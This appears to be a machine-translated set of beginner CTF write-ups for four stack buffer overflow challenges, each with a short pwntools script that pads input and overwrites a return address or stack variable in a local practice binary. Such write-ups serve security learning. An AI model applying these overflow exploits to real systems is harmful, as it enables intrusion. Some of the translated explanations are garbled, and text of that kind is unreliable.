0x00 csaw ctf 2016 quals-warmup
Simple stack overflow problems, the protection did not open, novice practice with
Test run twice and found the address given is not dynamic, so the problem is very simple
Padding 64 characters need to be filled, plus EBP eight characters, a total of 72 characters
from pwn import *
p = process('./warmup')
p.sendline('a'*72 + p64(0x40060d))
p.interactive()
0x01 EasyCTF 2017-doubly_dangerous
32 program, opened the NX protection
Check pseudo code, I first want to read the v5 is equal to that 11.28125, 11.28125 storage but do not know the
View of hexadecimal 11.28125
00803441 we get the hexadecimal number, but a big endian system employed, so the real value of 0x41348000
on the stack distance between s and v5 is 0x40, it is necessary to fill character 64
from pwn import *
p = process('./doubly_dangerous')
p.sendline('a'*64 + p32(0x41348000))
p.interactive()
Another approach is to address the return address for the give_flag s cover, but tried many times and failed
0x02 sCTF 2016 q1-pwn1
32 program, opened the NX protection
See pseudocode, where s limit of 32 characters, and s from ebp to 60 characters;
then the input is found in the I into you. This time we can think about, if we enter a certain I. In the case of the buffer size unchanged, converted to you, will not cause a buffer overflow can overwrite the return address.
Here the most important thing is to understand c ++ this pseudo-code, but I do not understand ~~
from pwn import *
p = process('./pwn1')
p.sendline('I'*21 + 'a' + p32(0x08048F0D))
p.interactive()
0x03 Tokyo West CTF 3rd 2017-just_do_it
32 program, opened the NX protection
Check pseudo-code, strcmp buffer overflow exists here
Calculate the padding is 20 characters
from pwn import *
p = process('./just_do_it')
p.sendline('a'*20 + p32(0x0804A080))
p.interactive()